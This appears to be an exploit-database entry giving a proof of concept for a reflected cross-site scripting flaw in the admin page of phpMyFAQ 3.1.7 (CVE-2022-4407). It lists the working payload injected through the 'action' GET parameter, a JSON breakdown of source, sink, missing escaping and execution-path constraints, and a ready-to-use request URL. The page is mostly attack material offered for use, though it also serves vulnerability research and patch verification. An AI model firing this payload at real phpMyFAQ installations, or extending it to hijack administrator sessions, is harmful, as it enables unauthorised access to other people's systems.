📄 phpMyFAQ 3.1.7 Cross Site Scripting

# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpMyFAQ
    # Software Link: https://github.com/thorsten/phpMyFAQ
    # Version: 3.1.7
    # Tested on: Ubuntu Windows
    # CVE : CVE-2022-4407
    
    PoC: 
    Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
    
    Details: 
    {
        "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
        "Vulnerable Variable": "action",
        "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
        "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
        "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
        "Attack Payload": "\"><script>alert('XSS')</script>",
        "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
        "Request Parameters": "action",
        "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
        "Request Method": "GET",
        "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
    }
    
    [Replace Your Domain Name]